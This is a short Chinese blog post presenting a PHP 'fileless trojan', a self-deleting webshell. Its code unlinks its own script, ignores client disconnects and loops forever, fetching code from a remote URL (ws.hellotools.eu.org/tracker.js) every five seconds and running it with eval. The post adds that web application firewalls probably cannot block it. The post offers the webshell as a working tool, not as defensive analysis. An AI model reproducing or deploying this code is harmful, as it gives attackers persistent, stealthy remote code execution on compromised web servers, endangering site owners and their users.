跳至内容
liuzhen932 的小窝
返回

PHP无文件木马

本文内容最后更新于 2021-08-20 12:23。本文仅为纪念之用,内容仅供参考,不保证其时效性和准确性。

利用 php 的无文件木马,上传一个运行后会删除自己的脚本。它会驻留在内存中运行,脚本内容是一个死循环:隔一段时间运行一下远程 VPS 上的代码。这种没有文件落地的 webshell 想必 waf 也没办法拦截。

【分析】利用 php 的无文件木马,上传一个运行后会删除自己的脚本。它会驻留在内存中运行,脚本内容是一个死循环:隔一段时间运行一下远程 VPS 上的代码。这种没有文件落地的 webshell 想必 waf 也没办法拦截。

【代码】

<?php
    unlink($_SERVER['SCRIPT_FILENAME']);
    ignore_user_abort(true);
    set_time_limit(0);//Windows 最好不要设置为 0, 9999更合适
    $remote_file ='https://ws.hellotools.eu.org/tracker.js';
    while($code = file_get_contents($remote_file)){
        @eval($code);
        sleep(5);//休眠时间
    };
?>

查杀报告:


分享这篇文章:

上一篇
用 GitLab CI 进行持续集成
下一篇
编程中 Foo,Bar 到底是什么意思

人机验证:请刷新页面以加载评论区